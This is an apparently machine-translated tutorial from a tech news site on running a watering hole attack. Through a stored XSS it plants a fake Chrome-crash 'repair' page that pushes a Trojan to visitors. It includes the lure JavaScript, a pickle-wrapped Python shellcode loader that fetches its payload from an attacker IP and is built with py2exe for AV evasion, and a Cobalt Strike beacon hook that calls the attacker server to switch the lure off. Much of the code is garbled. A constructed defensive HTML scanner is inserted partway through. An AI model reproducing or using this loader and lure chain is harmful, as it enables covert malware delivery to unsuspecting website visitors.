2025-01-17 Update From: SLTechnology News&Howtos, Network Security
Shulou(Shulou.com) 06/01 Report--
This article mainly explains how to use phishing to carry out a watering hole attack. Interested readers may wish to take a look. The method introduced here is simple, fast and practical; let the editor take you through how a phishing lure is used to achieve a watering hole attack.
First, a brief introduction to the concepts:
1. XSS. The wiki describes XSS as a kind of code injection, so a lot can be done with it, not just an alert box (many people seem to think XSS is only an alert box and don't recognize it unless something pops up): stealing cookies and so on. The watering hole attack implemented below is one such use.
2. Watering hole attack. The term comes from the animal world (technology really does come from life): crocodiles lurk in a water hole waiting for prey to come and drink, and strike when the prey is eating and relaxed. In the network world, the attacker analyzes the user's behavior, plants a trap on a path the user must take, and waits for the user to fall for it.
Note: on analysis this is a watering hole attack; whether or not it also counts as phishing does not matter.
Second, principle
Principle: on a website the target will visit, use JS to carefully construct a page that induces users to download a Trojan.
Prerequisites:
1. A stored XSS, preferably with webshell permissions so the page can be changed easily.
2. An AV-evading Trojan that actually evades detection; it must not be flagged as soon as it lands.
3. An online-notification and auto-shutdown plug-in, so nobody has to keep watching the page and the lure page is taken down once the target takes the bait.
III. Implementation
Process:
1. Write a lure page in JS. Don't use an "update Flash" page; that trick has been played out for years.
I wrote two pages: one imitates the page shown after the Chrome browser crashes, the other is a pop-up page built with layer.
Code 1, Chrome browser crash page:
Var body = document.body; var _ left = window.innerWidth * 0.3 + 'px'; var _ top = window.innerHeight * 0.3 +' px'; var _ height = window.innerHeight body [XSS _ clean] = `
Oh, it's freaking out! There was a problem displaying this page. Please enable the display plug-in on your page, which may be helpful. Fix it immediately
Effect figure 1:
(Users download the Trojan when they click Repair.)
Code 2, pop-up window built with layer
You can see layer's official demo code at https://layer.layui.com/.
The specific content is not written out here, because each page needs its own analysis; adapt it yourself.
layui.use('layer', function () {
  var layer = layui.layer; // the popup layer
  layer.open({
    type: 1,
    skin: 'layui-layer-rim', // with a border
    area: ['420px', '240px'], // width and height
    content: 'html content'
  });
});
Premise: the layer component has to be included first; when you inject the XSS, you can include one more script tag.
Effect figure 2:
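As an added example from the defender's side (not code from the article): a scanner over stored or rendered HTML that flags the signs of the injected lure described above, namely a script tag pulling a library such as layui from a host outside the site's allowlist, inline script blocks, and links that hand the visitor an executable. The allowlisted host, the suffix list and the sample markup are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

EXE_SUFFIXES = (".exe", ".scr", ".msi", ".hta")  # constructed: never served by a "repair" link

class LureScanner(HTMLParser):
    """Collects findings while parsing; nothing is rendered or executed."""

    def __init__(self, allowed_script_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_script_hosts}
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            src = a.get("src")
            if src is None:
                self._in_script = True  # inline block: its text is recorded in handle_data
            else:
                host = urlparse(src).netloc.lower()
                if host and host not in self.allowed:  # empty netloc = same-origin
                    self.findings.append(("external-script", src))
        elif tag == "a" and (a.get("href") or "").lower().endswith(EXE_SUFFIXES):
            self.findings.append(("exe-download", a["href"]))

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.findings.append(("inline-script", data.strip()[:60]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

def scan_html(html, allowed_script_hosts=("static.example.com",)):
    """Return (kind, detail) findings for one HTML document; [] means clean."""
    parser = LureScanner(allowed_script_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings

if __name__ == "__main__":
    # Constructed sample: injected layui include, inline popup script, .exe "repair" link.
    sample = ('<script src="https://static.example.com/app.js"></script>'
              '<script src="http://cdn.attacker.invalid/layui.js"></script>'
              '<script>layui.use("layer", function () {});</script>'
              '<a href="http://cdn.attacker.invalid/fix.exe">Fix it immediately</a>')
    for kind, detail in scan_html(sample):
        print(kind, detail)
```

Run it against a snapshot of the target page taken from outside the site, since the article's own process swaps the lure out once a beacon reports in.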
2. AV evasion
CS (Cobalt Strike) is used here, with deserialization plus detachment for evasion; refer to this article:
https://mp.weixin.qq.com/s/sd73eL3-TnMm0zWLCC8cOQ
Do not package with pyinstaller, or it will certainly be flagged; py2exe is recommended, but it has its own problem: it produces more than one file after compilation. I checked many documents without solving it; in the end, testing showed that only libffi-7.dll needs to be shipped alongside, which is barely usable.
Code (you don't have to use django; just separate out the shellcode):
Import pickleimport base64,requestsshellcode = "" import ctypes,urllib.request,codecs,base64resp = requests.get ("http://39.*.*.*/shellcode.txt")base64_code = resp.contentshellcode = base64.b64decode (base64_code) shellcode = codecs.escape_decode (shellcode) [0] shellcode = bytearray (shellcode) # set VirtualAlloc return type to ctypes.c_uint64ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64# request memory ptr = ctypes.windll.kernel32.VirtualAlloc (ctypes.c_int (0)) Ctypes.c_int (len (shellcode)), ctypes.c_int (0x3000), ctypes.c_int (0x40)) # put in shellcodebuf = (ctypes.c_char * len (shellcode)) .from_buffer (shellcode) ctypes.windll.kernel32.RtlMoveMemory (ctypes.c_uint64 (ptr), buf Ctypes.c_int (len (shellcode)) # create a thread to execute handle = ctypes.windll.kernel32.CreateThread (ctypes.c_int (0), ctypes.c_int (0), ctypes.c_uint64 (ptr), ctypes.c_int (0), ctypes.c_int (0) from the first address of the shellcode prevention location Ctypes.pointer (ctypes.c_int (0)) # wait for the thread created above to finish running ctypes.windll.kernel32.WaitForSingleObject (ctypes.c_int (handle), ctypes.c_int (- 1)) "" class AAAA (object): def _ _ reduce__ (self): return (exec, (shellcode) ) ret = pickle.dumps (AAAA ()) ret_base64 = base64.b64encode (ret) ret_base32 = base64.b32encode (ret) print (ret_base32) print (ret_base64) ret_decode = base64.b64decode (ret_base64) import base64,pickle,ctypes,urllib.request,codecs Requestsret = b'QACJKXQEAAAAAAAAACGAQYTVNFWHI2LOOOKIYBDFPBSWHFE3TNBSWY3DDN5SGKLTUPB2CEKIKMJQXGZJWG. RPWG33EMUQD24TFONYY3PNZ2GK3TUBIFHG2DFNRWGG33EMUQD2IDCMFZWKNRUFZRDMNDEMVRW6ZDFFBRGC='ret_decode = base64.b32decode (ret) # print (ret_decode) pickle.loads (ret_decode) from distutils.core import setupimport py2exesetup (options= {'py2exe': {' optimize': 2, 'bundle_files': 1,' compressed': True,},} Windows= [{"script": "test9.py",}], zipfile=None,)
3. Online notification and automatic shutdown
Use this project:
Https://github.com/TheKingOfDuck/XSS-Fishing2-CS
The most interesting part of the whole process is here:
The general principle is that a server side is needed which serves the malicious XSS code while no beacon is online. Once the CS beacon comes online, it triggers an event that sends a special request (one carrying the IP of the online host), which cancels the malicious XSS code so the page returns to normal, achieving automatic shutdown.
During the test I found the online reminder was not easy to use; what I needed was a notification from WeCom, so I moved this part of the function to the server side.
Specific code:
CS plug-in
On beacon_initial {$webhook = "https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=*****************************"; local ('$externalIP $computerName $userName'); $externalIP = replace (beacon_info ($1," external "),"," _ "); $computerName = replace (beacon_info ($1," computer "),"," _ ") $userName = replace (beacon_info ($1, "user"), "", "_"); $message = 'New Bot Online:\ n\ n Computer name:'.$computerName.'\ n\ nUsername:'.$userName.'\ n\ nexternalIP:'.$externalIP; $xssApi = "http://39.*.*.*/xss.php?ip=".$externalIP; @ curl_command = @ (' curl','- Xbox, 'GET', $xssApi) Exec (@ curl_command);}
Server PHP implementation:
Effect:
At this point, I believe you have a deeper understanding of how phishing is used to achieve a watering hole attack. You might as well try it out in practice. More related content is available through the relevant channels on this website; follow us and keep learning!